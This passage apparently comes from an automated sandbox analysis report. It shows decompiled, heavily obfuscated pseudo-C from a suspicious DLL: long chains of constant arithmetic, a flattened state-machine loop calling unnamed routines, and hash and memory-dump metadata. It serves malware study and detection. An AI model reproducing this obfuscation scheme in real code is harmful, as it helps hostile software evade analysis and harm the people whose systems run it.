                          				_v220 = _v220 + 0xffffec6a;
                          				_v220 = _v220 ^ 0x00e96603;
                          				_v204 = 0x9e1a7f;
                          				_v204 = _v204 >> 5;
                          				_v204 = _v204 ^ 0x0004f0d3;
                          				_v268 = 0x424ea5;
                          				_v268 = _v268 ^ 0x63de6ac8;
                          				_v268 = _v268 + 0xffff47e2;
                          				_v268 = _v268 ^ 0x639b6c4f;
                          				_v260 = 0xd00e0b;
                          				_v260 = _v260 + 0x7bec;
                          				_v260 = _v260 + 0x9dda;
                          				_v260 = _v260 ^ 0x00d127d1;
                          				_v200 = 0x4c3c29;
                          				_v200 = _v200 + 0xffffc8b9;
                          				_v200 = _v200 ^ 0x004c04e2;
                          				_v248 = 0x4debf8;
                          				_v248 = _v248 + 0xffff1b2a;
                          				_v248 = _v248 << 9;
                          				_v248 = _v248 ^ 0x9a0e4400;
                          				_v228 = 0x8afd86;
                          				_v228 = _v228 / _t936;
                          				_v228 = _v228 << 4;
                          				_v228 = _v228 ^ 0x001768a0;
                          				_v96 = 0x2eb3c6;
                          				_v96 = _v96 << 0xd;
                          				_v96 = _v96 ^ 0xd678c020;
                          				_v420 = 0x274aed;
                          				_v420 = _v420 | 0x31740d1a;
                          				_v420 = _v420 + 0xffff9582;
                          				_v420 = _v420 | 0x350cf820;
                          				_v420 = _v420 ^ 0x35767196;
                          				_v364 = 0x6881b7;
                          				_v364 = _v364 * 7;
                          				_v364 = _v364 + 0xffffc912;
                          				_v364 = _v364 * 0x25;
                          				_v364 = _v364 ^ 0x69b6ddf9;
                          				_v184 = 0xd44f20;
                          				_v184 = _v184 ^ 0xce5a0ea9;
                          				_v184 = _v184 ^ 0xce89b855;
                          				_v264 = 0x81d5a2;
                          				_v264 = _v264 >> 8;
                          				_v264 = _v264 ^ 0x29112c15;
                          				_v264 = _v264 ^ 0x291faa41;
                          				_v100 = 0x37cb15;
                          				_t937 = 6;
                          				_v100 = _v100 * 0x62;
                          				_v100 = _v100 ^ 0x1559514e;
                          				_v380 = 0xd5dbc2;
                          				_v380 = _v380 ^ 0x7753e321;
                          				_v380 = _v380 + 0xffff7b0c;
                          				_v380 = _v380 << 8;
                          				_v380 = _v380 ^ 0x85ba1641;
                          				_v176 = 0xe5b425;
                          				_v176 = _v176 ^ 0xa878a978;
                          				_v176 = _v176 ^ 0xa898c785;
                          				_v120 = 0xd260b8;
                          				_v120 = _v120 / _t937;
                          				_v120 = _v120 ^ 0x00230c57;
                          				_v288 = 0xdcc1d5;
                          				_v288 = _v288 | 0xf1bc740f;
                          				_v288 = _v288 >> 0xf;
                          				_v288 = _v288 ^ 0x000063e4;
                          				_v232 = 0xe5d66a;
                          				_t938 = 0x2c;
                          				_v232 = _v232 * 0x6c;
                          				_v232 = _v232 / _t938;
                          				_v232 = _v232 ^ 0x02301c7d;
                          				_v296 = 0x2a124;
                          				_v296 = _v296 | 0xd0f8a1f6;
                          				_v296 = _v296 >> 3;
                          				_v296 = _v296 ^ 0x1a145567;
                          				_v160 = 0xc3c6af;
                          				_v160 = _v160 + 0xd2dc;
                          				_v160 = _v160 ^ 0x00c22786;
                          				_v348 = 0x8f150e;
                          				_v348 = _v348 + 0xa59e;
                          				_t939 = 0x59;
                          				_v348 = _v348 / _t939;
                          				_v348 = _v348 >> 0xe;
                          				_v348 = _v348 ^ 0x00038203;
                          				_v412 = 0x22c1c6;
                          				_v412 = _v412 | 0x52a0f1e9;
                          				_v412 = _v412 >> 0xe;
                          				_v412 = _v412 + 0x5f9c;
                          				_v412 = _v412 ^ 0x0003206f;
                          				_v256 = 0x6eace8;
                          				_v256 = _v256 | 0x5e36471d;
                          				_v256 = _v256 + 0xaa22;
                          				_v256 = _v256 ^ 0x5e7c911d;
                          				_v372 = 0x114227;
                          				_v372 = _v372 << 0xe;
                          				_v372 = _v372 >> 4;
                          				_v372 = _v372 + 0xffff3250;
                          				_v372 = _v372 ^ 0x05091a3a;
                          				_v152 = 0xb2c113;
                          				_v152 = _v152 | 0xd4a79ff0;
                          				_v152 = _v152 ^ 0xd4b69369;
                          				_v404 = 0xac8dd0;
                          				_v404 = _v404 | 0xfe2c74c4;
                          				_v404 = _v404 + 0xfffff2df;
                          				_v404 = _v404 ^ 0xd6ca137b;
                          				_v404 = _v404 ^ 0x2865160f;
                          				_v92 = 0xc872d4;
                          				_v92 = _v92 ^ 0x1ab36d9e;
                          				_v92 = _v92 ^ 0x1a793755;
                          				_v104 = 0x4ab196;
                          				_v104 = _v104 << 8;
                          				_v104 = _v104 ^ 0x4ab50517;
                          				_v448 = 0xada0e7;
                          				_t940 = 0x71;
                          				_v448 = _v448 * 0x69;
                          				_v448 = _v448 ^ 0xf900bd50;
                          				_v448 = _v448 + 0x197e;
                          				_v448 = _v448 ^ 0xbe3853b0;
                          				_v396 = 0x11e923;
                          				_v396 = _v396 + 0x3954;
                          				_v396 = _v396 / _t940;
                          				_v396 = _v396 >> 0xc;
                          				_v396 = _v396 ^ 0x00018e0c;
                          				_v336 = 0x5f85c1;
                          				_v336 = _v336 | 0x2e05641a;
                          				_v336 = _v336 + 0xffffe3b2;
                          				_v336 = _v336 ^ 0x2e57dda5;
                          				_v144 = 0xd04b4f;
                          				_v144 = _v144 | 0x24a920ad;
                          				_v144 = _v144 ^ 0x24f2194c;
                          				_v332 = 0xa51135;
                          				_v332 = _v332 | 0x0e3f3b11;
                          				_v332 = _v332 << 1;
                          				_v332 = _v332 ^ 0x1d7bc296;
                          				_v432 = 0x91d3da;
                          				_v432 = _v432 ^ 0xfb7827da;
                          				_v432 = _v432 ^ 0x8307cadb;
                          				_v432 = _v432 ^ 0x96a6215b;
                          				_v432 = _v432 ^ 0xee460da5;
                          				_v440 = 0x76ea73;
                          				_t941 = 0x68;
                          				_v440 = _v440 * 0x64;
                          				_v440 = _v440 * 0x74;
                          				_v440 = _v440 + 0xffff4177;
                          				_v440 = _v440 ^ 0x0c5f6cc4;
                          				_v84 = 0xe35803;
                          				_v84 = _v84 << 2;
                          				_v84 = _v84 ^ 0x038e6518;
                          				_v416 = 0xaf3ba8;
                          				_v416 = _v416 / _t941;
                          				_v416 = _v416 << 4;
                          				_v416 = _v416 ^ 0x48935165;
                          				_v416 = _v416 ^ 0x4881449f;
                          				_v212 = 0x801900;
                          				_v212 = _v212 + 0xffff42b5;
                          				_v212 = _v212 ^ 0x0072cd25;
                          				_v308 = 0xdd451d;
                          				_v308 = _v308 << 7;
                          				_v308 = _v308 + 0xffff5c98;
                          				_v308 = _v308 ^ 0x6ea87981;
                          				_v400 = 0xde1a46;
                          				_v400 = _v400 + 0xffff765a;
                          				_v400 = _v400 / _t941;
                          				_v400 = _v400 << 9;
                          				_v400 = _v400 ^ 0x044894be;
                          				_v316 = 0xd965ab;
                          				_t942 = 0x67;
                          				_v316 = _v316 / _t942;
                          				_v316 = _v316 ^ 0xab5bfdd1;
                          				_v316 = _v316 ^ 0xab5ad192;
                          				_v408 = 0x2ea377;
                          				_v408 = _v408 ^ 0x7c77aa70;
                          				_v408 = _v408 * 0x1b;
                          				_t943 = 0x5b;
                          				_v408 = _v408 / _t943;
                          				_v408 = _v408 ^ 0x00544ec9;
                          				_v324 = 0xbe9a08;
                          				_t944 = 0x3b;
                          				_v324 = _v324 * 0x43;
                          				_v324 = _v324 >> 2;
                          				_v324 = _v324 ^ 0x0c769314;
                          				_v300 = 0x976b15;
                          				_v300 = _v300 + 0xffff7da5;
                          				_v300 = _v300 ^ 0x81b758ca;
                          				_v300 = _v300 ^ 0x81238506;
                          				_v180 = 0xcec496;
                          				_v180 = _v180 + 0xd8a;
                          				_v180 = _v180 ^ 0x00c56088;
                          				_v188 = 0xaed086;
                          				_v188 = _v188 / _t944;
                          				_v188 = _v188 ^ 0x0009ea52;
                          				_v196 = 0x3b56fa;
                          				_v196 = _v196 ^ 0xac6111bd;
                          				_v196 = _v196 ^ 0xac5e4370;
                          				_v292 = 0x9c517b;
                          				_t945 = 0xe;
                          				_v292 = _v292 * 0x4d;
                          				_v292 = _v292 << 0x10;
                          				_v292 = _v292 ^ 0x81f0babf;
                          				_v164 = 0xb8b001;
                          				_v164 = _v164 * 0x6d;
                          				_v164 = _v164 ^ 0x4ea63487;
                          				_v172 = 0xad6cfe;
                          				_v172 = _v172 + 0xffff2ed4;
                          				_v172 = _v172 ^ 0x00a06f33;
                          				_v392 = 0x7c182;
                          				_v392 = _v392 + 0xffff354a;
                          				_v392 = _v392 >> 9;
                          				_v392 = _v392 | 0x25902c29;
                          				_v392 = _v392 ^ 0x259a4e3f;
                          				_v384 = 0x5bc0d6;
                          				_v384 = _v384 << 1;
                          				_v384 = _v384 >> 3;
                          				_v384 = _v384 >> 0xb;
                          				_v384 = _v384 ^ 0x00007445;
                          				_v148 = 0xb53a42;
                          				_v148 = _v148 + 0x9a8c;
                          				_v148 = _v148 ^ 0x00ba1df9;
                          				_v340 = 0x4937cc;
                          				_v340 = _v340 / _t945;
                          				_v340 = _v340 * 0x55;
                          				_v340 = _v340 ^ 0x01b4526f;
                          				_v156 = 0xcb2355;
                          				_v156 = _v156 + 0x87d8;
                          				_v156 = _v156 ^ 0x00cab12c;
                          				_v276 = 0x1d3606;
                          				_v276 = _v276 ^ 0xef8573e3;
                          				_v276 = _v276 + 0xe74c;
                          				_v276 = _v276 ^ 0xef9451f2;
                          				_v124 = 0xea90d8;
                          				_v124 = _v124 >> 0xc;
                          				_v124 = _v124 ^ 0x000c3a09;
                          				_v132 = 0x9d7def;
                          				_v132 = _v132 << 0xe;
                          				_v132 = _v132 ^ 0x5f719987;
                          				_v376 = 0x89d7c2;
                          				_v376 = _v376 + 0xfffff23e;
                          				_v376 = _v376 | 0x7c68b11f;
                          				_v376 = _v376 ^ 0xbb3726b5;
                          				_v376 = _v376 ^ 0xc7d510ca;
                          				_v140 = 0x76a014;
                          				_t946 = 0x62;
                          				_v140 = _v140 * 0x5d;
                          				_v140 = _v140 ^ 0x2b1c15f7;
                          				_v236 = 0x97a0b2;
                          				_v236 = _v236 + 0xb8c3;
                          				_v236 = _v236 / _t946;
                          				_v236 = _v236 ^ 0x00048326;
                          				_v244 = 0xf40f05;
                          				_v244 = _v244 >> 9;
                          				_v244 = _v244 + 0xffff2918;
                          				_v244 = _v244 ^ 0xfff951ac;
                          				_v252 = 0x8be7d4;
                          				_t947 = 0x63;
                          				_v252 = _v252 * 0x1e;
                          				_v252 = _v252 | 0x42cac185;
                          				_v252 = _v252 ^ 0x52ef1e67;
                          				_v116 = 0xbde76;
                          				_v116 = _v116 * 0x7b;
                          				_v116 = _v116 ^ 0x05b04958;
                          				_v328 = 0xeb1d65;
                          				_v328 = _v328 + 0xffffd1f9;
                          				_v328 = _v328 / _t947;
                          				_v328 = _v328 ^ 0x00025d34;
                          				_v280 = 0x68b6dc;
                          				_v280 = _v280 << 4;
                          				_v280 = _v280 + 0xffffca90;
                          				_v280 = _v280 ^ 0x06815cee;
                          				_v284 = 0x6fbf52;
                          				_t948 = 0x39;
                          				_v284 = _v284 / _t948;
                          				_v284 = _v284 >> 0xc;
                          				_v284 = _v284 ^ 0x000af32e;
                          				_v128 = 0xe16a7a;
                          				_v128 = _v128 << 0xa;
                          				_v128 = _v128 ^ 0x85a6bd86;
                          				_v136 = 0xc45446;
                          				_v136 = _v136 * 0x2c;
                          				_v136 = _v136 ^ 0x21b71382;
                          				_v356 = 0x71f336;
                          				_v356 = _v356 ^ 0x2de7f7fe;
                          				_v356 = _v356 ^ 0x8a07c7d3;
                          				_v356 = _v356 ^ 0x93c759d9;
                          				_v356 = _v356 ^ 0x3457e38a;
                          				_v444 = 0xc2e3ca;
                          				_v444 = _v444 + 0xd370;
                          				_v444 = _v444 * 0x17;
                          				_v444 = _v444 | 0x81628588;
                          				_v444 = _v444 ^ 0x91feaa64;
                          				_v216 = 0xda26e7;
                          				_v216 = _v216 | 0x60c5a9c9;
                          				_v216 = _v216 ^ 0x60dd12b5;
                          				_v192 = 0x3f7410;
                          				_v192 = _v192 ^ 0x1d5bbab7;
                          				_v192 = _v192 ^ 0x1d6fbf93;
                          				_v312 = 0x4ada65;
                          				_v312 = _v312 << 0xd;
                          				_v312 = _v312 >> 7;
                          				_v312 = _v312 ^ 0x00bfdaf9;
                          				_v272 = 0xabf11;
                          				_v272 = _v272 | 0xa59dca8e;
                          				_v272 = _v272 + 0x20a8;
                          				_v272 = _v272 ^ 0xa5a7fe59;
                          				_v224 = 0x8674d0;
                          				_t1041 = 0x129d0b2;
                          				_t1038 = 0x319c4b5;
                          				_t949 = 0x14;
                          				_v224 = _v224 / _t949;
                          				_v224 = _v224 ^ 0x000de1f0;
                          				_v320 = 0xda9bb0;
                          				_v320 = _v320 | 0x2a57cad9;
                          				_t950 = 0x36;
                          				_v320 = _v320 * 0xf;
                          				_v320 = _v320 ^ 0x831ebdeb;
                          				_v240 = 0xa163ed;
                          				_v240 = _v240 * 0xb;
                          				_v240 = _v240 ^ 0x8dcbf844;
                          				_v240 = _v240 ^ 0x8b2bfc33;
                          				_v428 = 0x5ed42b;
                          				_v428 = _v428 + 0xffff1d19;
                          				_v428 = _v428 * 0x50;
                          				_v428 = _v428 << 2;
                          				_v428 = _v428 ^ 0x75680dd8;
                          				_v88 = 0xfa72dc;
                          				_v88 = _v88 >> 7;
                          				_v88 = _v88 ^ 0x0007f8f8;
                          				_v388 = 0x10dc91;
                          				_v388 = _v388 / _t950;
                          				_v388 = _v388 >> 2;
                          				_v388 = _v388 | 0xaac1de12;
                          				_v388 = _v388 ^ 0xaac723cf;
                          				_v304 = 0xa7cb34;
                          				_v304 = _v304 ^ 0x1c82ce84;
                          				_v304 = _v304 + 0xffff27ec;
                          				_v304 = _v304 ^ 0x1c2c2c1b;
                          				_v360 = 0x85a407;
                          				_v360 = _v360 << 0x10;
                          				_v360 = _v360 ^ 0xf399b7e8;
                          				_t951 = 0x7b;
                          				_v360 = _v360 * 0xb;
                          				_v360 = _v360 ^ 0xc3d703da;
                          				_v108 = 0x2c5900;
                          				_v108 = _v108 | 0x18e96d33;
                          				_v108 = _v108 ^ 0x18efd740;
                          				_v368 = 0x82a9c5;
                          				_v368 = _v368 * 0x63;
                          				_v368 = _v368 / _t951;
                          				_v368 = _v368 << 9;
                          				_v368 = _v368 ^ 0xd254d318;
                          				_v344 = 0x646456;
                          				_v344 = _v344 | 0x8bd14a3d;
                          				_v344 = _v344 ^ 0xb757bf6b;
                          				_v344 = _v344 ^ 0xc7e8113d;
                          				_v344 = _v344 ^ 0xfb40f9ed;
                          				_v352 = 0x76afda;
                          				_v352 = _v352 | 0xbd2b6ebb;
                          				_v352 = _v352 + 0xffffcbc9;
                          				_v352 = _v352 << 5;
                          				_v352 = _v352 ^ 0xaffdfdca;
                          				while(1) {
                          					L1:
                          					_t1017 = 0xbed0fa7;
                          					_t952 = 0x2dc73db;
                          					_t880 = 0x45ef02b;
                          					goto L2;
                          					do {
                          						while(1) {
                          							L2:
                          							_t1054 = _t929 - _t880;
                          							if(_t1054 <= 0) {
                          								break;
                          							}
                          							__eflags = _t929 - 0xa3576f8;
                          							if(_t929 == 0xa3576f8) {
                          								_t1018 =  *0xd56224; // 0x0
                          								E00D52B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
                          								_t929 = _t1038;
                          								L25:
                          								_t880 = 0x45ef02b;
                          								_t952 = 0x2dc73db;
                          								_t1017 = 0xbed0fa7;
                          								goto L26;
                          							}
                          							__eflags = _t929 - _t1017;
                          							if(__eflags == 0) {
                          								_push(_v156);
                          								_push(_v340);
                          								_push(_v148);
                          								_t883 = E00D4E1F8(0xd313f8, _v384, __eflags);
                          								_t884 =  *0xd56224; // 0x0
                          								__eflags = E00D3F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0xd313f8, _v376, _v80, _v140) - _v260;
                          								_t929 =  ==  ? 0x2dc73db : _t1038;
                          								E00D4FECB(_t883, _v236, _v244, _v252, _v116);
                          								_t1048 =  &(_t1048[0xf]);
                          								L15:
                          								_t1041 = 0x129d0b2;
                          								goto L25;
                          							}
                          							__eflags = _t929 - 0xda5043f;
                          							if(__eflags != 0) {
                          								goto L26;
                          							}
                          							_t929 = 0x2e16ae;
                          						}
                          						if(_t1054 == 0) {
                          							_push(_v336);
                          							_push(_v396);
                          							_push(_v448);
                          							_t891 = E00D4E1F8(0xd313a8, _v104, __eflags);
                          							_push(_v440);
                          							_t1039 = _t891;
                          							_push(_v432);
                          							_push(_v332);
                          							_t892 = E00D4E1F8(0xd31498, _v144, __eflags);
                          							_v64 = _v424;
                          							_t894 = E00D400C5(_t1039, _v84, _v416);
                          							_v56 = _v56 & 0x00000000;
                          							_v60 = _t1039;
                          							_v52 = 1;
                          							_v68 = 2 + _t894 * 2;
                          							_v48 =  &_v68;
                          							_t897 = 0x20;
                          							_v76 = _t897;
                          							__eflags = E00D349A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
                          							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
                          							E00D4FECB(_t1039, _v300, _v180, _v188, _v196);
                          							E00D4FECB(_t892, _v292, _v164, _v172, _v392);
                          							_t1048 =  &(_t1048[0x18]);
                          							L17:
                          							_t1038 = 0x319c4b5;
                          							goto L15;
                          						}
                          						if(_t929 == 0x2e16ae) {
                          							_push(_v264);
                          							_push(_v184);
                          							_push(_v364);
                          							_t905 = E00D4E1F8(0xd31468, _v420, __eflags);
                          							_push(_v120);
                          							_push(_v176);
                          							_push(_v380);
                          							__eflags = E00D3738A(_v288, _t905, _v232, _v168,  &_v80, E00D4E1F8(0xd31318, _v100, __eflags), _v296) - _v112;
                          							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
                          							E00D4FECB(_t905, _v160, _v348, _v412, _v256);
                          							E00D4FECB(_t906, _v372, _v152, _v404, _v92);
                          							_t1048 =  &(_t1048[0x11]);
                          							goto L17;
                          						}
                          						if(_t929 == _t1041) {
                          							_push(_v216);
                          							_push(_v444);
                          							_push(_v356);
                          							_t1045 = E00D4E1F8(0xd31438, _v136, __eflags);
                          							_v44 = _v436;
                          							_v40 = _v208;
                          							_v36 = _v96;
                          							_t918 =  *0xd56224; // 0x0
                          							_t974 =  *0xd56224; // 0x0
                          							_t919 = E00D350E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0xd31438, 0xd31438,  &_v44, _v200, 0xd31438, _v240, _t913);
                          							_t1052 =  &(_t1048[0x10]);
                          							__eflags = _t919 - _v248;
                          							if(_t919 != _v248) {
                          								_t929 = 0xa3576f8;
                          							} else {
                          								_t929 = _t1038;
                          								_t1046 = 1;
                          							}
                          							E00D4FECB(_t1045, _v428, _v88, _v388, _v304);
                          							_t1048 =  &(_t1052[3]);
                          							goto L15;
                          						}
                          						if(_t929 == _t952) {
                          							_t925 =  *0xd56224; // 0x0
                          							_push(_t952);
                          							_push(_t952);
                          							_t977 = E00D3C5D8( *((intOrPtr*)(_t925 + 0x54)));
                          							_t1048 =  &(_t1048[3]);
                          							_t927 =  *0xd56224; // 0x0
                          							__eflags = _t977;
                          							_t929 =  !=  ? _t1041 : _t1038;
                          							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
                          							goto L1;
                          						}
                          						if(_t929 != _t1038) {
                          							goto L26;
                          						}
                          						E00D3F7FE(_v344, _v80, _v352, _v228);
                          						L9:
                          						return _t1046;
                          						L26:
                          						__eflags = _t929 - 0x45eecb1;
                          					} while (__eflags != 0);
                          					goto L9;
                          				}
                          			}
                          0x00d34727
                          0x00000000
                          0x00d34727
                          0x00d34634
                          0x00d34636
                          0x00d3464e
                          0x00d3465a
                          0x00d34661
                          0x00d3466c
                          0x00d34690
                          0x00d346c7
                          0x00d346de
                          0x00d346ef
                          0x00d346f4
                          0x00d343ef
                          0x00d343ef
                          0x00000000
                          0x00d343ef
                          0x00d34638
                          0x00d3463e
                          0x00000000
                          0x00000000
                          0x00d34644
                          0x00d34644
                          0x00d3427e
                          0x00d344d1
                          0x00d344dd
                          0x00d344e1
                          0x00d344ec
                          0x00d344f1
                          0x00d344fa
                          0x00d344fc
                          0x00d34500
                          0x00d3450e
                          0x00d34526
                          0x00d3452d
                          0x00d34534
                          0x00d34543
                          0x00d34551
                          0x00d3455c
                          0x00d3456a
                          0x00d34571
                          0x00d34579
                          0x00d345d3
                          0x00d345e3
                          0x00d345fb
                          0x00d3461b
                          0x00d34620
                          0x00d344c7
                          0x00d344c7
                          0x00000000
                          0x00d344c7
                          0x00d3428a
                          0x00d343f9
                          0x00d34405
                          0x00d3440c
                          0x00d34414
                          0x00d34419
                          0x00d34427
                          0x00d3442e
                          0x00d3447a
                          0x00d3448e
                          0x00d3449f
                          0x00d344bf
                          0x00d344c4
                          0x00000000
                          0x00d344c4
                          0x00d34292
                          0x00d34311
                          0x00d3431d
                          0x00d34321
                          0x00d34334
                          0x00d3433a
                          0x00d34349
                          0x00d3435e
                          0x00d3437e
                          0x00d343a9
                          0x00d343b2
                          0x00d343b7
                          0x00d343ba
                          0x00d343c1
                          0x00d343ca
                          0x00d343c3
                          0x00d343c5
                          0x00d343c7
                          0x00d343c7
                          0x00d343e7
                          0x00d343ec
                          0x00000000
                          0x00d343ec
                          0x00d34296
                          0x00d342e9
                          0x00d342ee
                          0x00d342ef
                          0x00d342f8
                          0x00d342fa
                          0x00d342fd
                          0x00d34302
                          0x00d34306
                          0x00d34309
                          0x00000000
                          0x00d34309
                          0x00d3429a
                          0x00000000
                          0x00000000
                          0x00d342b9
                          0x00d342c2
                          0x00d342cc
                          0x00d3472c
                          0x00d3472c
                          0x00d3472c
                          0x00000000
                          0x00d34738

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !Sw$)<L$Et$L$R$T9$Vdd$_EBM$sv$zj$J'$c${
                          • API String ID: 0-2179300830
                          • Opcode ID: 2b93cfee14aeb0621a187a61986be230e36d463b6bd121c95387a00114071501
                          • Instruction ID: 32a490d1e19390d9059510a489e5e8902063e3faf7438772d2b03d1a6e750452
                          • Opcode Fuzzy Hash: 2b93cfee14aeb0621a187a61986be230e36d463b6bd121c95387a00114071501
                          • Instruction Fuzzy Hash: 2A92EC711093819FD3B9CF25C98AB9FBBE2FBC4304F10891DE19A96260D7B19949CF52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          [Graph not reproduced: control flow of the function at 0x00D467E6, with nodes marked Executed / Not Executed]
                          C-Code - Quality: 94%
                          			E00D467E6(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, signed int* _a28, signed int _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48) {
                          				intOrPtr _v4;
                          				signed int _v8;
                          				intOrPtr _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				signed int _v40;
                          				signed int _v44;
                          				signed int _v48;
                          				signed int _v52;
                          				signed int _v56;
                          				signed int _v60;
                          				signed int _v64;
                          				signed int _v68;
                          				signed int _v72;
                          				signed int _v76;
                          				signed int _v80;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				signed int _v100;
                          				signed int _v104;
                          				signed int _v108;
                          				signed int _v112;
                          				signed int _v116;
                          				signed int _v120;
                          				signed int _v124;
                          				signed int _v128;
                          				signed int _v132;
                          				signed int _v136;
                          				signed int _v140;
                          				signed int _v144;
                          				signed int _v148;
                          				signed int _v152;
                          				signed int _v156;
                          				signed int _v160;
                          				signed int _v164;
                          				signed int _v168;
                          				signed int _v172;
                          				signed int _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				signed int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				signed int _v212;
                          				signed int _v216;
                          				signed int _v220;
                          				signed int _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				signed int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				signed int _v268;
                          				signed int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				signed int _v284;
                          				signed int _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _t846;
                          				intOrPtr _t847;
                          				signed int _t861;
                          				void* _t866;
                          				signed int _t867;
                          				signed int _t874;
                          				signed int* _t876;
                          				signed int _t885;
                          				void* _t937;
                          				signed int _t946;
                          				signed int _t960;
                          				signed int _t961;
                          				signed int _t962;
                          				signed int _t963;
                          				signed int _t964;
                          				signed int _t965;
                          				signed int _t966;
                          				signed int _t967;
                          				signed int _t968;
                          				signed int _t969;
                          				signed int _t970;
                          				signed int _t971;
                          				signed int _t972;
                          				signed int _t973;
                          				signed int _t974;
                          				signed int _t975;
                          				signed int _t976;
                          				signed int _t978;
                          				signed int _t980;
                          				signed int _t985;
                          				signed int _t986;
                          				signed int* _t989;
                          				void* _t991;
                          
                          				_t876 = _a28;
                          				_push(_a48);
                          				_push(_a44);
                          				_v4 = __ecx;
                          				_push(_a40);
                          				_push(_a36);
                          				_push(_a32);
                          				_push(_t876);
                          				_push(_a24);
                          				_push(_a20 & 0x0000ffff);
                          				_push(_a16);
                          				_push(_a12);
                          				_push(_a8);
                          				_push(_a4);
                          				_push(__edx);
                          				_push(__ecx);
                          				E00D4FE29(_a20 & 0x0000ffff);
                          				_v304 = 0x84e682;
                          				_t989 =  &(( &_v304)[0xe]);
                          				_v304 = _v304 + 0xeb1b;
                          				_v304 = _v304 ^ 0x0f7f391c;
                          				_v304 = _v304 ^ 0x0ffae881;
                          				_t874 = 0;
                          				_v80 = 0xd03450;
                          				_t978 = 0x7e00160;
                          				_v80 = _v80 + 0x474c;
                          				_v80 = _v80 ^ 0x00d07b8f;
                          				_v40 = 0x62fb41;
                          				_v40 = _v40 ^ 0x58566629;
                          				_v40 = _v40 ^ 0x58349da0;
                          				_v56 = 0xe1b746;
                          				_v56 = _v56 + 0x8be3;
                          				_v56 = _v56 ^ 0x00e2c329;
                          				_v32 = 0xe6e4c5;
                          				_v32 = _v32 + 0xfb3f;
                          				_v32 = _v32 ^ 0x00e7a004;
                          				_v164 = 0x3535e2;
                          				_v164 = _v164 + 0xb15e;
                          				_v164 = _v164 + 0xffff4c2e;
                          				_v164 = _v164 ^ 0x0075336e;
                          				_v256 = 0xe056c0;
                          				_v256 = _v256 >> 0xf;
                          				_v12 = 0;
                          				_t960 = 0xf;
                          				_v256 = _v256 / _t960;
                          				_t961 = 0x75;
                          				_v256 = _v256 / _t961;
                          				_v256 = _v256 ^ 0x00040000;
                          				_v64 = 0xc12004;
                          				_v64 = _v64 | 0x05a7924d;
                          				_v64 = _v64 ^ 0x01e7b24d;
                          				_v200 = 0x3d9b4;
                          				_v200 = _v200 + 0xffffba05;
                          				_t962 = 0x4d;
                          				_push("true");
                          				_v200 = _v200 / _t962;
                          				_v200 = _v200 >> 0xa;
                          				_v200 = _v200 ^ 0x00080002;
                          				_v264 = 0xdbb33c;
                          				_pop(_t963);
                          				_v264 = _v264 / _t963;
                          				_v264 = _v264 ^ 0x3bde5a68;
                          				_t964 = 0x74;
                          				_v264 = _v264 * 0x67;
                          				_v264 = _v264 ^ 0x14497559;
                          				_v172 = 0x2a3d0;
                          				_v172 = _v172 + 0xffff520a;
                          				_v172 = _v172 + 0xffffc196;
                          				_v172 = _v172 ^ 0x0001b670;
                          				_v16 = 0x40a0dc;
                          				_v16 = _v16 >> 0xc;
                          				_v16 = _v16 ^ 0x8000040a;
                          				_v280 = 0x3a90ef;
                          				_v280 = _v280 + 0xfffff29b;
                          				_v280 = _v280 + 0xd15d;
                          				_v280 = _v280 + 0xffff2fb1;
                          				_v280 = _v280 ^ 0x003a8498;
                          				_v276 = 0x2b48bd;
                          				_v276 = _v276 * 0x59;
                          				_v276 = _v276 | 0x0b3e9c0e;
                          				_v276 = _v276 + 0x2f0e;
                          				_v276 = _v276 ^ 0x0f3f0c8c;
                          				_v244 = 0xf133cf;
                          				_v244 = _v244 * 0x50;
                          				_v244 = _v244 >> 0xe;
                          				_v244 = _v244 >> 2;
                          				_v244 = _v244 ^ 0x00004b7f;
                          				_v220 = 0x48bde3;
                          				_v220 = _v220 * 7;
                          				_v220 = _v220 << 3;
                          				_v220 = _v220 << 7;
                          				_v220 = _v220 ^ 0xf4c4d41f;
                          				_v152 = 0xdfcbbb;
                          				_v152 = _v152 / _t964;
                          				_v152 = _v152 ^ 0x15954f38;
                          				_v152 = _v152 ^ 0x1594a2df;
                          				_v236 = 0x79b2d;
                          				_v236 = _v236 + 0xffffa56f;
                          				_v236 = _v236 >> 0xc;
                          				_v236 = _v236 + 0xffff51ce;
                          				_v236 = _v236 ^ 0xffff5342;
                          				_v300 = 0x53b7c5;
                          				_v300 = _v300 | 0xbc55bbc8;
                          				_v300 = _v300 >> 0xb;
                          				_v300 = _v300 * 0x4a;
                          				_v300 = _v300 ^ 0x06ca0610;
                          				_v300 = 0x831a37;
                          				_v300 = _v300 >> 0xa;
